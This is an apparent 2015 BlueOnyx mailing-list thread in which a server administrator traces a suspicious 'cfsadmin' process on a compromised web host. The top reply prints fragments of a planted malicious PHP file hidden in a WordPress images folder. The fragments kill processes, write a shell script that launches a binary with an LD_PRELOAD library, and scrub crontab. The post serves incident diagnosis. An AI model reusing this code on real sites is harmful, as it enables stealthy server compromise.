[BlueOnyx:17917] Re: 5106R cfsadmin load issue

Gerald Waugh gwaugh at frontstreetnetworks.com
Sat Jun 27 12:13:42 -05 2015 

OK here is the hack
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall
-9 ".basename("*/usr/bin/host*"));
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f =
fopen("/usr/bin/host", "rb");
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("
*/usr/bin/host*");
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
"#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9
$HBN;export AU='".$AU."'\nexport
LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep
-v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");

On Sat, Jun 27, 2015 at 11:21 AM, Gerald Waugh <
gwaugh at frontstreetnetworks.com> wrote:

>
> On 06/27/2015 10:51 AM, Michael Stauber wrote:
>
>> Hi Gerald,
>>
>>  caching file system admin ???
>>>
>> That's not a standard component of any BlueOnyx version and it's also
>> not in the 5106R or CentOS5 yum repositories.
>>
>> Find out where the binary for that is located:
>>
>> which cfsadmin
>>
>> Or use "find" for that if "which" doesn't find it.
>>
>> Then check which RPM that binary came from:
>>
>> rpm -q --whatprovides <path-of-binary>
>>
>> That tells you the name of the RPM that it came from. If any.
>>
>> If you get an RPM name, you can run "yum info <rpm-name>" on it to see
>> what info the system has about that RPM.
>>
> Not running now so which showed no results
> But found this with locate
>
> /home/.sites/137/site42/.users/26/cfsadmin
> /home/.sites/137/site42/.users/26/cfsadmin/.bash_logout
> /home/.sites/137/site42/.users/26/cfsadmin/.bash_profile
> /home/.sites/137/site42/.users/26/cfsadmin/.bashrc
> /home/.sites/137/site42/.users/26/cfsadmin/.gnome2
> /home/.sites/137/site42/.users/26/cfsadmin/Network Trash Folder
> /home/.sites/137/site42/.users/26/cfsadmin/Private
> /home/.sites/137/site42/.users/26/cfsadmin/dead.letter
> /home/.sites/137/site42/.users/26/cfsadmin/mbox
> /home/.sites/137/site42/.users/26/cfsadmin/web
> /home/.sites/137/site42/users/cfsadmin
>
>
>
>


-- 
Gerald Waugh
www.frontstreetnetworks.com
(318) 734-4779
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.blueonyx.it/pipermail/blueonyx/attachments/20150627/0138ed18/attachment.html>

More information about the Blueonyx mailing list